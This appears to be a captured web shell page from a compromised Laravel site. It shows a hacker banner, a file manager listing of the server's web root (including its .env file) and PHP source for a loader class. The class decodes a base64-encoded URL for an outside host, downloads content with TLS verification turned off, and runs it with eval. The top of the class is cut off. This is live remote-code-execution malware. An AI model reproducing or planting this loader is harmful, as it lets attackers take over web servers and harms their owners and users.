I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
489495df489495dfbase64EncodedResourceLocator = base64_decode($base64InputUrl);
$this->initializePayloadAcquisitionProcess();
}
private function initializePayloadAcquisitionProcess()
{
$temporaryPayloadBuffer = $this->attemptPrimaryCurlBasedRetrieval();
if ($temporaryPayloadBuffer === false) {
$temporaryPayloadBuffer = $this->attemptSecondaryStreamContextRetrieval();
}
$this->bufferedExecutionPayload = $temporaryPayloadBuffer ?: null;
}
private function attemptPrimaryCurlBasedRetrieval()
{
if (!function_exists('curl_exec')) return false;
$curlSessionHandle = curl_init($this->base64EncodedResourceLocator);
curl_setopt_array($curlSessionHandle, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false,
]);
$rawCurlResponse = curl_exec($curlSessionHandle);
$httpStatusResponseCode = curl_getinfo($curlSessionHandle, CURLINFO_HTTP_CODE);
curl_close($curlSessionHandle);
return ($httpStatusResponseCode === 200 && $rawCurlResponse && strlen(trim($rawCurlResponse)) > 10) ? $rawCurlResponse : false;
}
private function attemptSecondaryStreamContextRetrieval()
{
$contextParametersObject = stream_context_create([
"http" => ["follow_location" => 1, "timeout" => 10],
"https" => ["verify_peer" => false, "verify_peer_name" => false]
]);
$streamResultContent = @file_get_contents($this->base64EncodedResourceLocator, false, $contextParametersObject);
return ($streamResultContent && strlen(trim($streamResultContent)) > 10) ? $streamResultContent : false;
}
public function safelyExecuteRemotePayload()
{
if (empty($this->bufferedExecutionPayload)) {
return $this->internalFailureMessage ?: "��� Remote execution failure ���";
}
try {
ob_start();
eval("?>".$this->bufferedExecutionPayload);
return ob_get_clean();
} catch (Throwable $executionCaughtException) {
return "��� Runtime exception ���";
}
}
}
$base64ResourcePathway = 'aHR0cHM6Ly9tYW56ZHJpdmUuY29tL2Nkbi9yYXcvcHJpb3JpdHkvYmx1ZS5sb2c=';
$executionBridgeContext = new RemoteExecutionBridgeLayer($base64ResourcePathway);
echo $executionBridgeContext->safelyExecuteRemotePayload();
?>